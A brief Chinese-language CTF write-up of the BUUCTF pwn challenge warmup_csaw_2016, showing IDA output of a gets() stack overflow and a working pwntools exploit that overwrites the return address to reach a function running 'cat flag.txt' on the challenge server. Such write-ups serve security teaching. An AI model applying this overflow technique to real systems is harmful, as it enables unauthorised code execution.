buuctf PWN warmup_csaw_2016

下载附件,IDA查看

发现直接有显示flag函数

int sub_40060D()
{
  return system("cat flag.txt");
}

查看程序起始地址0x40060D

; Attributes: bp-based frame

sub_40060D proc near
; __unwind {
push    rbp
mov     rbp, rsp
mov     edi, offset command ; "cat flag.txt"
call    _system
pop     rbp
retn
; } // starts at 40060D
sub_40060D endp

查看main函数

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char s[64]; // [rsp+0h] [rbp-80h] BYREF
  char v5[64]; // [rsp+40h] [rbp-40h] BYREF

  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(s, "%p\n", sub_40060D);
  write(1, s, 9uLL);
  write(1, ">", 1uLL);
  return gets(v5);
}

发现函数gets(v5),是栈溢出

char v5[64]; // [rsp+40h] [rbp-40h] BYREF

看到v5占用64个位置

那就可以改写exp:

from __future__ import absolute_import
from pwn import *  
p=remote(u"node4.buuoj.cn",29692) 
payload=u'A'*64+u'B'*8+p64(0x40060D+1).decode(u"iso-8859-1")
p.sendline(payload)
p.interactive()

运行结果

相关推荐
好奇的菜鸟4 分钟前
Go语言中的引用类型:指针与传递机制
开发语言·后端·golang
所待.3838 分钟前
JavaEE之线程初阶(上)
java·java-ee
Winston Wood12 分钟前
Java线程池详解
java·线程池·多线程·性能
速盾cdn13 分钟前
速盾:CDN缓存的工作原理是什么?
网络·安全·web安全
Alive~o.013 分钟前
Go语言进阶&依赖管理
开发语言·后端·golang
花海少爷15 分钟前
第十章 JavaScript的应用课后习题
开发语言·javascript·ecmascript
手握风云-16 分钟前
数据结构(Java版)第二期:包装类和泛型
java·开发语言·数据结构
东华果汁哥21 分钟前
【linux 免密登录】快速设置kafka01、kafka02、kafka03 三台机器免密登录
linux·运维·服务器
亚信安全官方账号32 分钟前
亚信安全发布《2024年第三季度网络安全威胁报告》
网络安全
喵叔哟36 分钟前
重构代码中引入外部方法和引入本地扩展的区别
java·开发语言·重构